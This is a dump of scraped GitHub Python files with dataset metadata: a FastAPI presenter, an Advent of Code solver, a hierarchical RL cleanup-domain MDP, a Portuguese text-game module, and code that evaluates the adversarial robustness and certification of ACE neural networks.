src.shared.helpers.external_interfaces.http_fastapi_requests import FastAPIHttpRequest, FastAPIHttpResponse\n\n\ndef get_answers_presenter(event, context):\n repo = Environments.get_answer_repo()()\n usecase = GetAnswersUsecase(repo)\n controller = GetAnswersController(usecase)\n \n httpRequest = FastAPIHttpRequest(data=event)\n response = controller(httpRequest)\n httpResponse = FastAPIHttpResponse(\n body=response.body, status_code=response.status_code, headers=response.headers\n )\n \n return httpResponse.to_dict()","repo_name":"Lucasdvs10/Projeto-Integrador-2023.2","sub_path":"src/modules/get_answers/app/get_answers_presenter.py","file_name":"get_answers_presenter.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23484639671","text":"#!/usr/bin/env python -OO\nimport aocpaiv as aoc\nimport re\n\n\ndef solve(text):\n total = 0\n for x, y, c, p in re.findall(r'(\\d+)\\-(\\d+) (.)\\: (\\w+)', text):\n total += p.count(c) in range(int(x), int(y)+1)\n return total\n\n\ndef test():\n aoc.test_subject(solve)\n aoc.test(\"\"\"\n1-3 a: abcde\n1-3 b: cdefg\n2-9 c: ccccccccc\n\"\"\") == 2\n\n\nif __name__ == '__main__':\n test()\n 
print(solve(aoc.read_files()))\n","repo_name":"paiv/aoc2020","sub_path":"code/02-1-password-philosophy/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71193070522","text":"# Python imports\nfrom __future__ import print_function\nfrom collections import defaultdict\nimport copy\n\n# Other imports\nfrom simple_rl.mdp.MDPClass import MDP\nfrom simple_rl.planning import ValueIteration\nfrom simple_rl.amdp.AMDPTaskNodesClass import NonPrimitiveAbstractTask, RootTaskNode\nfrom simple_rl.amdp.abstr_domains.cleanup.AbstractCleanupL1StateClass import *\nfrom simple_rl.amdp.abstr_domains.cleanup.AbstractCleanupStateMapperClass import AbstractCleanupL1StateMapper\nfrom simple_rl.tasks.cleanup.cleanup_state import CleanUpState\n\nclass CleanupL1GroundedAction(NonPrimitiveAbstractTask):\n def __init__(self, l1_action_string, subtasks, l0_domain):\n '''\n Args:\n l1_action_string (str)\n subtasks (list)\n l0_domain (CleanUpMDP)\n '''\n self.action = l1_action_string\n self.l0_domain = l0_domain\n self.lifted_action = self.grounded_to_lifted_action(l1_action_string)\n\n tf, rf = self._terminal_function, self._reward_function\n NonPrimitiveAbstractTask.__init__(self, l1_action_string, subtasks, tf, rf)\n\n def _terminal_function(self, state):\n '''\n Args:\n state (CleanUpState)\n\n Returns:\n is_terminal (bool)\n '''\n\n assert type(state) == CleanUpState, 'Actual type of state is {}'.format(type(state))\n\n def _robot_door_terminal_func(s, door_color):\n return s.robot.current_door == door_color\n def _robot_room_terminal_func(s, room_color):\n return s.robot.current_room == room_color and s.robot.current_door == ''\n def _robot_to_block_terminal_func(s, block_color):\n return s.robot.adjacent_block == block_color\n def _block_to_door_terminal_func(s, block_color, door_color):\n for block in s.blocks:\n if block.block_color == block_color and block.current_door == door_color:\n return True\n return False\n def _block_to_room_terminal_func(s, block_color, room_color):\n for block in s.blocks:\n if block.block_color == block_color and block.current_room == room_color and block.current_door == '':\n return True\n return False\n\n state_mapper = AbstractCleanupL1StateMapper(self.l0_domain)\n projected_state = state_mapper.map_state(state)\n action_parameter = self.grounded_to_action_parameter(self.action)\n\n if self.lifted_action == 'toDoor':\n return _robot_door_terminal_func(projected_state, action_parameter)\n if self.lifted_action == 'toRoom':\n return _robot_room_terminal_func(projected_state, action_parameter)\n if self.lifted_action == 'toObject':\n return _robot_to_block_terminal_func(projected_state, action_parameter)\n if self.lifted_action == 'objectToDoor':\n return _block_to_door_terminal_func(projected_state, projected_state.robot.adjacent_block, action_parameter)\n if self.lifted_action == 'objectToRoom':\n return _block_to_room_terminal_func(projected_state, projected_state.robot.adjacent_block, action_parameter)\n\n raise ValueError('Lifted action {} not supported yet'.format(self.lifted_action))\n\n def _reward_function(self, state, action):\n assert type(state) == CleanUpState, 'Actual type of state is {}'.format(type(state))\n next_state = self.l0_domain.transition_func(state, action)\n return 1. 
if self._terminal_function(next_state) else 0.\n\n # -------------------------------\n # L1 Action Helper Functions\n # -------------------------------\n\n @staticmethod\n def grounded_to_lifted_action(grounded_action_str):\n return grounded_action_str.split('(')[0]\n\n @staticmethod\n def grounded_to_action_parameter(grounded_action_str):\n return grounded_action_str.split('(')[1].split(')')[0]\n\n @staticmethod\n def door_name_to_room_colors(door_name):\n return door_name.split('_')\n\n @staticmethod\n def get_other_room_color(state, door_name):\n connected_rooms = CleanupL1GroundedAction.door_name_to_room_colors(door_name)\n if state.robot.current_room == connected_rooms[0]:\n return connected_rooms[1]\n if state.robot.current_room == connected_rooms[1]:\n return connected_rooms[0]\n return ''\n\nclass CleanupRootGroundedAction(RootTaskNode):\n def __init__(self, action_str, subtasks, l1_domain, terminal_func, reward_func):\n self.action = action_str\n\n RootTaskNode.__init__(self, action_str, subtasks, l1_domain, terminal_func, reward_func)\n\nclass CleanupL1MDP(MDP):\n LIFTED_ACTIONS = ['toDoor', 'toRoom', 'toObject', 'objectToDoor', 'objectToRoom']\n\n # -------------------------------\n # Level 1 MDP description\n # -------------------------------\n\n def __init__(self, l0_domain):\n '''\n Args:\n l0_domain (CleanUpMDP)\n '''\n self.l0_domain = l0_domain\n\n state_mapper = AbstractCleanupL1StateMapper(l0_domain)\n l1_init_state = state_mapper.map_state(l0_domain.init_state)\n grounded_actions = CleanupL1MDP.ground_actions(l1_init_state)\n self.terminal_func = self._is_goal_state\n\n MDP.__init__(self, grounded_actions, self._transition_function, self._reward_function, l1_init_state)\n\n def _is_goal_state(self, state):\n for block in state.blocks: # type: CleanupL1Block\n if block.block_color == self.l0_domain.task.block_color:\n return block.current_room == self.l0_domain.task.goal_room_color and \\\n state.robot.current_room == self.l0_domain.task.goal_room_color\n raise ValueError('Did not find an L1 Block object with color {}'.format(self.l0_domain.task.block_color))\n\n def _reward_function(self, state, action):\n '''\n Args:\n state (CleanupL1State)\n action (str)\n\n Returns:\n reward (float)\n '''\n next_state = self._transition_function(state, action)\n return 1. 
if self._is_goal_state(next_state) else 0.\n\n def _transition_function(self, state, action):\n '''\n Args:\n state (CleanupL1State)\n action (str): grounded action\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n lifted_action = CleanupL1GroundedAction.grounded_to_lifted_action(action)\n\n if lifted_action == 'toDoor':\n target_door_name = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_door(state, target_door_name)\n\n if lifted_action == 'toRoom':\n destination_room = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_room(state, destination_room)\n\n if lifted_action == 'toObject':\n block_color = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_block(state, block_color)\n\n if lifted_action == 'objectToDoor':\n target_door_name = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n # next_state = self._move_agent_to_door(state, target_door_name)\n next_state = self._move_block_to_door(next_state, target_door_name)\n\n if lifted_action == 'objectToRoom':\n destination_room = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_room(state, destination_room)\n next_state = self._move_block_to_room(next_state, destination_room)\n\n next_state.set_terminal(self._is_goal_state(next_state))\n\n return next_state\n\n @classmethod\n def ground_actions(cls, l1_state):\n '''\n Given a list of lifted/parameterized actions and the L0 cleanup domain,\n generate a list of grounded actions based on the attributes of the objects\n instantiated in the L0 domain.\n Args:\n l1_state (CleanupL1State): underlying ground level MDP\n\n Returns:\n actions (list): grounded actions\n '''\n grounded_actions = []\n\n for door in l1_state.doors: # type: CleanupL1Door\n grounded_actions.append(cls.LIFTED_ACTIONS[0] + '(' + str(door) + ')')\n grounded_actions.append(cls.LIFTED_ACTIONS[3] + '(' + str(door) + ')')\n\n for room in l1_state.rooms: # type: CleanupL1Room\n grounded_actions.append(cls.LIFTED_ACTIONS[1] + '(' + str(room) + ')')\n grounded_actions.append(cls.LIFTED_ACTIONS[4] + '(' + str(room) + ')')\n\n for block in l1_state.blocks: # type: CleanupL1Block\n grounded_actions.append(cls.LIFTED_ACTIONS[2] + '(' + str(block.block_color) + ')')\n\n return grounded_actions\n\n # -----------------------------------\n # Agent Navigation Helper functions\n # -----------------------------------\n\n @staticmethod\n def _move_agent_to_door(state, door_name):\n '''\n If the specified door connects the agent's current room, then it may transition to the door.\n Args:\n state (CleanupL1State)\n door_name (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n destination_door = state.get_l1_door_for_color(door_name)\n if destination_door and state.robot.current_room in door_name:\n\n # If there is already a block at the door, then move it to the other room\n block = state.get_l1_block_for_color(state.robot.adjacent_block)\n if block:\n if block.current_door == door_name:\n other_room = CleanupL1GroundedAction.get_other_room_color(state, door_name)\n next_state = CleanupL1MDP._move_block_to_room(state, other_room)\n\n next_state.robot.current_door = door_name\n next_state.robot.current_room = destination_door.current_room\n return next_state\n\n @staticmethod\n def _move_agent_to_room(state, destination_room_color):\n '''\n Move the agent to the specified room 
if it is at a door connecting it to the said room.\n Args:\n state (CleanupL1State)\n destination_room_color (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n if destination_room_color in state.robot.current_door:\n next_state.robot.current_room = destination_room_color\n next_state.robot.current_door = ''\n return next_state\n\n @staticmethod\n def _move_agent_to_block(state, block_color):\n '''\n Move the agent to the specified block if they are both in the same room.\n Args:\n state (CleanupL1State)\n block_color (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n target_block = state.get_l1_block_for_color(block_color)\n if target_block:\n if target_block.current_room == state.robot.current_room:\n next_state.robot.adjacent_block = target_block.block_color\n next_state.robot.current_door = ''\n return next_state\n\n # -----------------------------------\n # Block Navigation Helper functions\n # -----------------------------------\n\n @staticmethod\n def _move_block_to_door(state, door_name):\n '''\n Move the agent's adjacent block to the specified door if they are in a room connected by said door.\n Args:\n state (CleanupL1State)\n door_name (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n block = next_state.get_l1_block_for_color(next_state.robot.adjacent_block)\n destination_door = next_state.get_l1_door_for_color(door_name)\n if block and destination_door:\n if state.robot.current_room in door_name and block.current_room in door_name:\n next_state.robot.current_room = block.current_room\n next_state.robot.current_door = ''\n block.current_door = door_name\n block.current_room = destination_door.current_room\n return next_state\n\n @staticmethod\n def _move_block_to_room(state, destination_room_color):\n '''\n Move the block to the specified room if the block is at a door connecting said room.\n Args:\n state (CleanupL1State)\n destination_room_color (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n block = next_state.get_l1_block_for_color(next_state.robot.adjacent_block)\n if block:\n if destination_room_color in block.current_door:\n block.current_room = destination_room_color\n block.current_door = ''\n return next_state\n\n# -----------------------------------\n# Debug functions\n# -----------------------------------\n\ndef debug_l1_domain():\n from simple_rl.tasks.cleanup.cleanup_block import CleanUpBlock\n from simple_rl.tasks.cleanup.cleanup_door import CleanUpDoor\n from simple_rl.tasks.cleanup.cleanup_room import CleanUpRoom\n from simple_rl.tasks.cleanup.cleanup_task import CleanUpTask\n from simple_rl.tasks.cleanup.CleanupMDPClass import CleanUpMDP\n\n def get_l1_policy(domain):\n vi = ValueIteration(domain, sample_rate=1)\n vi.run_vi()\n\n policy = defaultdict()\n action_seq, state_seq = vi.plan(domain.init_state)\n\n print('Plan for {}:'.format(domain))\n for i in range(len(action_seq)):\n print(\"\\tpi[{}] -> {}\\n\".format(state_seq[i], action_seq[i]))\n policy[state_seq[i]] = action_seq[i]\n\n return policy\n\n task = CleanUpTask(\"purple\", \"red\")\n room1 = CleanUpRoom(\"room1\", [(x, y) for x in range(5) for y in range(3)], \"blue\")\n block1 = CleanUpBlock(\"block1\", 1, 1, color=\"green\")\n block2 = CleanUpBlock(\"block2\", 2, 4, color=\"purple\")\n block3 = CleanUpBlock(\"block3\", 8, 1, color=\"orange\")\n room2 = CleanUpRoom(\"room2\", [(x, y) for x in range(5, 10) for y in range(3)], 
color=\"red\")\n room3 = CleanUpRoom(\"room3\", [(x, y) for x in range(0, 10) for y in range(3, 6)], color=\"yellow\")\n rooms = [room1, room2, room3]\n blocks = [block1, block2, block3]\n doors = [CleanUpDoor(4, 0), CleanUpDoor(3, 2)]\n mdp = CleanUpMDP(task, rooms=rooms, doors=doors, blocks=blocks)\n\n amdp = CleanupL1MDP(mdp)\n\n get_l1_policy(amdp)\n","repo_name":"h2r/ltl-amdp","sub_path":"simple_rl/amdp/abstr_domains/cleanup/AbstractCleanupMDPClass.py","file_name":"AbstractCleanupMDPClass.py","file_ext":"py","file_size_in_byte":14665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"17863013171","text":"\nfrom jogo import estrutura_decisoria\nfrom view import decisao_bowser2_print, decisao_caminho_trabalho_print, decisao_casa_print, decisao_demissao_print, decisao_fake_news_print, decisao_ida_hospital_fome_print, enfrentando_bowser_print\n\n\ndef decisao_casa():\n decisao_casa_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_caminho_trabalho():\n decisao_caminho_trabalho_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_ida_hospital_fome():\n decisao_ida_hospital_fome_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef enfrentando_bowser():\n enfrentando_bowser_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_bowser2(personagem):\n decisao_bowser2_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_demissao(personagem):\n decisao_demissao_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_fake_news():\n decisao_fake_news_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef final():\n print(\"Fim de jogo deseja jogar novamente? 
Digite 1 para sim ou qualquer outra tecla para fechar o jogo\")\n decisao = int(input(\"--> \"))\n if (decisao == 1):\n jogar()","repo_name":"natfontanesi/JogoResilia","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35841213914","text":"import torch\nimport torch.nn as nn\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom typing import List, Tuple, Dict\n\nimport logging\nimport os\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom typing import Union, Tuple, Dict, List\n\nfrom robustabstain.ace.cert_deepTrunk import ai_cert_sample, ai_cert_sample_single_branch\nfrom robustabstain.ace.deepTrunk_networks import MyDeepTrunkNet\nfrom robustabstain.ace.networks import translate_net_name\nfrom robustabstain.ace.utils import AdvAttack\nfrom robustabstain.attacker.wrapper import AttackerWrapper\nfrom robustabstain.eval.log import write_sample_log, write_eval_report\nfrom robustabstain.utils.data_utils import get_dataset_stats\nfrom robustabstain.utils.helpers import convert_floatstr\nfrom robustabstain.utils.loaders import get_rel_sample_indices\nfrom robustabstain.utils.metrics import AverageMeter\nfrom robustabstain.utils.paths import eval_attack_log_filename\n\n\n\ndef build_ace_net(args: object, ace_model_path: str, device: str) -> MyDeepTrunkNet:\n \"\"\"Build an ACE network given by model path args.model.\n\n Args:\n args (object): Any object subclass exposing 'setattr` and 'getattr'.\n ace_model_path (str): Path to saved ACE model.\n device (str): device.\n\n Returns:\n MyDeepTrunkNet: Loaded ACE network (=Deeptrunk network)\n \"\"\"\n args.branch_nets = [translate_net_name(net) for net in args.branch_nets] if isinstance(args.branch_nets,list) else translate_net_name(args.branch_nets)\n args.gate_nets = None if args.gate_nets is None else [translate_net_name(net) for net in args.gate_nets]\n\n lossFn = nn.CrossEntropyLoss(reduction='none')\n def evalFn(x): return torch.max(x, dim=1)[1]\n input_dim, num_channels, num_classes = get_dataset_stats(args.dataset)\n dTNet = MyDeepTrunkNet.get_deepTrunk_net(\n args, device, lossFn, evalFn, input_dim, num_channels, num_classes, model_path=ace_model_path\n )\n\n return dTNet\n\n\ndef ace_eval(\n args: object, dTNet: MyDeepTrunkNet, device: str,\n test_loader: torch.utils.data.DataLoader, adv_norm: str,\n test_eps: str, cert_domain: str\n ) -> Tuple[\n Dict[str, float], np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray\n ]:\n \"\"\"Evaluate natural accuracy, empirical robustness, certified robustness and gate selection on a given\n ACE architecture. This evaluation assumes that only a single branch model is present in the ACE model.\n Further, a trunk model that may be present is ignored, meaning only the gate (selector) network and the\n branch\n\n\n\n\n\n network are evaluated.\n\n Args:\n args (object): Any object subclass exposing 'setattr` and 'getattr'.\n dTNet (MyDeepTrunkNet): Deeptrunk network (ACE architecture).\n device (str): device.\n test_loader (torch.utils.data.DataLoader): PyTorch loader with test data.\n adv_norm (str): Norm of the perturbation region.\n test_eps (str): Size of adversarial perturbation region (stringified).\n cert_domain (str): Certification domain. 
Must be 'zono' for COLT trained models\n and 'box' for IBP trained models.\n\n Returns:\n Tuple[Dict[str, float], np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n Dict containing model measures, natural predictions, array indicating accuracy,\n array indicating empirical robustness, array indicating certified robustness,\n array indicating selection by gate net, array indicating empirical robustness of\n selector, array indicating certified robustness of selector, sample indices.\n \"\"\"\n assert len(dTNet.gate_nets.keys()) == 1, 'Only evaluation of single branch ACE models supported.'\n exit_idx = 0\n dTNet.trunk_net = None # we dont care about the trunk\n dTNet.eval()\n dTNet.gate_nets[exit_idx].eval()\n dTNet.branch_nets[exit_idx].eval()\n\n test_eps_float = convert_floatstr(test_eps)\n n_samples = len(test_loader.dataset)\n nat_predictions = np.zeros(n_samples, dtype=np.int64)\n is_acc = np.zeros(n_samples, dtype=np.int64)\n is_rob = np.zeros(n_samples, dtype=np.int64)\n is_cert = np.zeros(n_samples, dtype=np.int64)\n is_select = np.zeros(n_samples, dtype=np.int64)\n select_rob = np.zeros(n_samples, dtype=np.int64) # gate predictions that are empirically robust\n select_cert = np.zeros(n_samples, dtype=np.int64) # gate predictions that are certifiable robust\n indices = np.zeros(n_samples, dtype=np.int64)\n\n adv_attack_gate = AdvAttack(\n eps=test_eps_float, n_steps=args.test_att_n_steps,\n step_size=args.test_att_step_size, adv_type=\"pgd\"\n )\n attacker = AttackerWrapper(\n adv_type=args.test_adv_attack, adv_norm=adv_norm, eps=test_eps_float, steps=args.test_att_n_steps,\n rel_step_size=args.test_att_step_size, version=args.autoattack_version,\n gamma_ddn=args.gamma_ddn, init_norm_ddn=args.init_norm_ddn, device=device\n )\n\n nat_acc = AverageMeter()\n rob_acc = AverageMeter()\n cert_acc = AverageMeter()\n selection_rate = AverageMeter()\n selection_rate_adv = AverageMeter()\n selection_rate_cert = AverageMeter()\n\n pbar = tqdm(test_loader, dynamic_ncols=True)\n for batch_idx, (inputs, targets, sample_indices) in enumerate(pbar):\n rel_sample_indices = get_rel_sample_indices(test_loader, sample_indices)\n inputs, targets = inputs.to(device), targets.to(device)\n\n gate_nat_out = dTNet.gate_nets[exit_idx](inputs).squeeze()\n nat_select = (gate_nat_out >= dTNet.threshold[exit_idx]).int()\n nat_out = dTNet.branch_nets[exit_idx](inputs)\n nat_pred = nat_out.argmax(1)\n\n \"\"\"GT Labels for attack are the predicted labels.\n This is necessary for the attack to also search\n for adversarial samples for inaccurate samples.\n \"\"\"\n _, _, _, adv_inputs, _ = dTNet.get_adv_loss(inputs, nat_pred, adv_attack_gate)\n gate_adv_out = dTNet.gate_nets[exit_idx](adv_inputs).squeeze()\n adv_select = gate_adv_out >= dTNet.threshold[exit_idx]\n\n adv_inputs = attacker.attack(dTNet.branch_nets[exit_idx], inputs, nat_pred)\n adv_out = dTNet.branch_nets[exit_idx](adv_inputs)\n adv_pred = adv_out.argmax(1)\n\n is_acc_batch = nat_pred.eq(targets).int().cpu().numpy()\n is_select_batch = nat_select.int().cpu().numpy()\n is_rob_batch = adv_pred.eq(nat_pred).int().cpu().numpy()\n select_rob_batch = adv_select.eq(nat_select).int().cpu().numpy()\n\n nat_predictions[rel_sample_indices] = nat_pred.cpu().numpy()\n is_acc[rel_sample_indices] = is_acc_batch\n is_rob[rel_sample_indices] = is_rob_batch\n is_select[rel_sample_indices] = is_select_batch\n select_rob[rel_sample_indices] = select_rob_batch\n indices[rel_sample_indices] = sample_indices\n\n for input, 
target, pred, select, rel_sample_idx in zip(inputs, targets, nat_pred, nat_select, rel_sample_indices):\n input, target = input.unsqueeze(0), target.unsqueeze(0)\n pred, select = pred.unsqueeze(0), select.unsqueeze(0)\n with torch.no_grad():\n is_cert_gate, is_cert_branch = ai_cert_sample_single_branch(\n dTNet, input, pred, select, cert_domain, test_eps_float\n )\n is_cert[rel_sample_idx] = is_cert_branch.item()\n select_cert[rel_sample_idx] = is_cert_gate.item()\n\n cert_acc.update(100 * is_cert_branch.item() * target.eq(pred).item(), 1)\n selection_rate_cert.update(100 * select.item() * is_cert_gate.item(), 1)\n nat_acc.update(100 * np.average(is_acc_batch), inputs.size(0))\n rob_acc.update(100 * np.average(is_rob_batch & is_acc_batch), inputs.size(0))\n selection_rate.update(100 * np.average(is_select_batch), inputs.size(0))\n selection_rate_adv.update(100 * np.average(is_select_batch & select_rob_batch), inputs.size(0))\n\n pbar.set_description('[V] ACE ({} eps={}): nat_acc={:.4f}, adv_acc={:.4f}, cert_acc={:.4f}, ' \\\n 'sel_rate_nat={:.4f}, sel_rate_adv={:.4f}, sel_rate_cert={:.4f},'.format(\n args.adv_norm, test_eps, nat_acc.avg, rob_acc.avg, cert_acc.avg,\n selection_rate.avg, selection_rate_adv.avg, selection_rate_cert.avg\n ))\n\n accs = {\n 'nat_acc': round(nat_acc.avg, 2),\n 'adv_acc': round(rob_acc.avg, 2),\n 'cert_acc': round(cert_acc.avg, 2),\n }\n\n return accs, nat_predictions, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, indices\n\n\ndef get_indicator_from_log(\n log_path: str, eps_str: str\n ) -> Tuple[bool, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Extract '{model_name}_is_acc', '{model_name}_is_rob{eps}', '{model_name}_is_cert{eps}',\n '{model_name}_is_select' columns from sample log.\n\n Args:\n log_path (str): Path to log file.\n eps_str (str): Perturbation region size.\n\n\n Returns:\n Tuple[bool, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n Indicators found, accuracy indicator, robustness indicator, certification indicator,\n ACE selector indicator, empirical robustness of selector, certified robustness of selector,\n natural predictions of branch\n \"\"\"\n indicators_found, is_acc, is_rob, is_cert = False, None, None, None\n is_select, select_rob, select_cert, pred = None, None, None, None\n if not os.path.isfile(log_path):\n logging.info(f'No log file {log_path} found, evaluating instead')\n return indicators_found, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, pred\n\n log_df = pd.read_csv(log_path, index_col=0)\n indices_col = [col for col in log_df.columns if 'sample_idx' in col]\n is_acc_col = [col for col in log_df.columns if 'is_acc' in col]\n is_rob_col = [col for col in log_df.columns if f'is_rob{eps_str}' in col]\n is_cert_col = [col for col in log_df.columns if f'is_cert{eps_str}' in col]\n is_select_col = [col for col in log_df.columns if 'is_select' in col]\n select_rob_col = [col for col in log_df.columns if 'select_rob' in col]\n select_cert_col = [col for col in log_df.columns if 'select_cert' in col]\n pred_col = [col for col in log_df.columns if 'pred' in col]\n\n if (len(is_acc_col) != 1 or len(is_rob_col) != 1 or len(is_cert_col) != 1 or\n len(is_select_col) != 1 or len(select_rob_col) != 1 or len(select_cert_col) != 1 or\n len(pred_col) != 1):\n logging.info(f'Not all columns found in logfile {log_path}, evaluating instead.')\n\n return indicators_found, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, 
pred\n\n indicators_found = True\n indices = log_df[indices_col[0]].to_numpy()\n is_acc = log_df[is_acc_col[0]].to_numpy()\n is_rob = log_df[is_rob_col[0]].to_numpy()\n is_cert = log_df[is_cert_col[0]].to_numpy()\n is_select = log_df[is_select_col[0]].to_numpy()\n select_rob = log_df[select_rob_col[0]].to_numpy()\n select_cert = log_df[select_cert_col[0]].to_numpy()\n pred = log_df[pred_col[0]].to_numpy()\n\n return indicators_found, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, pred\n\n\ndef get_ace_indicator(\n args: object, dTNet: MyDeepTrunkNet, model_dir: str, model_name: str, device: str,\n dataloader: torch.utils.data.DataLoader, eval_set: str, adv_norm: str, eps_str: str,\n use_existing: bool = False, write_log: bool = False, write_report: bool = False\n ) -> Tuple[\n float, float, float, np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray\n ]:\n \"\"\"Get 0-1 indicators for each sample on whether the given ACE model is accurate,\n empirically robust, certifably robust, selected by gate network, for the given perturbation region.\n If no existing sample log is found in the model_dir, the model is evaluated from scratch.\n This evaluation assumes that only a single branch model is present in the ACE model\n and a trunk model that may be present is ignored, meaning only the gate (selector) network\n and the branch network are evaluated.\n\n Args:\n args (object): Any object subclass exposing 'setattr` and 'getattr'.\n dTNet (MyDeepTrunkNet): Deeptrunk network (ACE architecture).\n model_dir (str): Directory in which the model is stored (and associated eval logs).\n model_name (str): Name of the model to evaluate.\n device (str): device.\n dataloader (torch.utils.data.DataLoader): Dataloader to evaluate.\n eval_set (str): Dataset split that is evaluated ('train', 'val', 'test').\n adv_norm (str): Norm of the adversarial perturbation region.\n eps_str (str): Perturbation region size.\n use_existing (bool, optional): If set, an existing model eval log will be used (if such a log exists).\n write_log (bool, optional): If set, the evaluation log will be written to file. Defaults to False.\n write_report (bool, optional): If set, evaluation report will be written. Defaults to False.\n\n Returns:\n Tuple[float, float, float, np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n nat. accuracy of branch, adv. accuracy of branch, cert. 
accuracy of branch, accuracy indicator,\n empirical robustness indicator, certified robustness indicator, gate selection indicator,\n gate empirical robustness, gate certified robustness, branch natural predictions\n \"\"\"\n # get indices order of samples in dataloader\n dataset_indices = np.arange(len(dataloader.dataset))\n if type(dataloader.dataset) == torch.utils.data.dataset.Subset:\n # Subset dataset have random index order\n dataset_indices = dataloader.dataset.indices\n\n # check first whether a log exists\n log_name = eval_attack_log_filename(eval_set, args.dataset, adv_norm, 'pgd')\n log_path = os.path.join(model_dir, log_name)\n indicators_found, is_acc, is_rob, is_cert, is_select, \\\n select_rob, select_cert, predictions = get_indicator_from_log(log_path, eps_str)\n\n if indicators_found and use_existing:\n nat_acc1 = round(100.0 * np.average(is_acc[dataset_indices]), 2)\n adv_acc1 = round(100.0 * np.average(is_acc[dataset_indices] & is_rob[dataset_indices]), 2)\n cert_acc1 = round(100.0 * np.average(is_acc[dataset_indices] & is_cert[dataset_indices]), 2)\n select_rate = round(100.0 * np.average(is_select[dataset_indices]), 2)\n is_acc = is_acc[dataset_indices]\n is_rob = is_rob[dataset_indices]\n is_cert = is_cert[dataset_indices]\n is_select = is_select[dataset_indices]\n select_rob = select_rob[dataset_indices]\n select_cert = select_cert[dataset_indices]\n predictions = predictions if predictions is None else predictions[dataset_indices]\n\n return nat_acc1, adv_acc1, cert_acc1, is_acc, is_rob, is_cert, \\\n is_select, select_rob, select_cert, predictions, dataset_indices\n\n # it is possible to run this function without a model given that a logfile is available\n if dTNet is None:\n raise ValueError(f'Error: no model provided and indicators not found in log {log_path}.')\n\n # put dataset into sequential dataloader to get deterministic sample order\n seq_dataloader = torch.utils.data.DataLoader(\n dataset=dataloader.dataset, batch_size=dataloader.batch_size,\n shuffle=False, num_workers=dataloader.num_workers\n )\n\n cert_domain = 'zono' if 'COLT' in model_name else 'box'\n accs, nat_preds, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, indices = ace_eval(\n args, dTNet, device, seq_dataloader, args.adv_norm, eps_str, cert_domain\n )\n assert (indices == dataset_indices).all(), 'Indices of ACE evaluation are not in expected order.'\n nat_acc1 = accs['nat_acc']\n adv_acc1 = accs['adv_acc']\n cert_acc1 = accs['cert_acc']\n\n if write_report:\n write_eval_report(\n args, out_dir=model_dir, nat_accs=[nat_acc1], adv_accs={eps_str: adv_acc1},\n adv_attack='pgd', dcert_accs={eps_str: cert_acc1}\n )\n\n if write_log:\n write_sample_log(\n model_name, model_dir, args.dataset, args.eval_set, args.adv_norm, 'pgd',\n indices=indices, is_acc=is_acc, preds=nat_preds, is_rob=is_rob,\n is_cert=is_cert, is_select=is_select, select_rob=select_rob,\n select_cert=select_cert, eps=eps_str\n )\n\n return nat_acc1, adv_acc1, cert_acc1, is_acc, is_rob, is_cert, \\\n is_select, select_rob, select_cert, predictions, dataset_indices","repo_name":"ymerkli/robust-abstain","sub_path":"robustabstain/eval/ace.py","file_name":"ace.py","file_ext":"py","file_size_in_byte":16865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"7772489703","text":"import numpy as np\nfrom datetime import date\nfrom scipy import integrate\nfrom astropy import units as u\nfrom astropy.coordinates import EarthLocation\n\nfrom .exposure import 
